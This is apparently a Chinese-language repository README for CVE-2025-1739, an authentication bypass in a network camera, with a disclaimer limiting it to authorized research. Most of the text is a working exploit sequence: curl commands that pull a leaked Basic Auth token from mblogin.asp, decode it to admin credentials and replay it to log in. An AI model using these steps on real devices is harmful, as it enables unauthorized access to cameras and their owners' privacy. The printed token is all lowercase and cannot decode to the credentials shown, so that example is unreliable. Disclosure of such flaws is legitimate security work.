| CVE | CVSS v3.1 | 评分 | CWE | 类型 |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | 通过 Basic Auth 泄露绕过身份验证 |
摄像头通过 mblogin.asp 端点泄露了一个有效的 Base64 编码 Basic Authentication 令牌。此令牌可被轻易解码并重新利用,从而在无需知道密码的情况下获得对设备的未授权访问权限。
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
响应中包含一个有效的 Basic Auth 令牌:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp 和 mblogin.asp 的异常访问。本仓库仅用于教育和授权安全研究。作者对任何滥用行为不承担责任。在测试任何设备之前,请务必获得明确许可。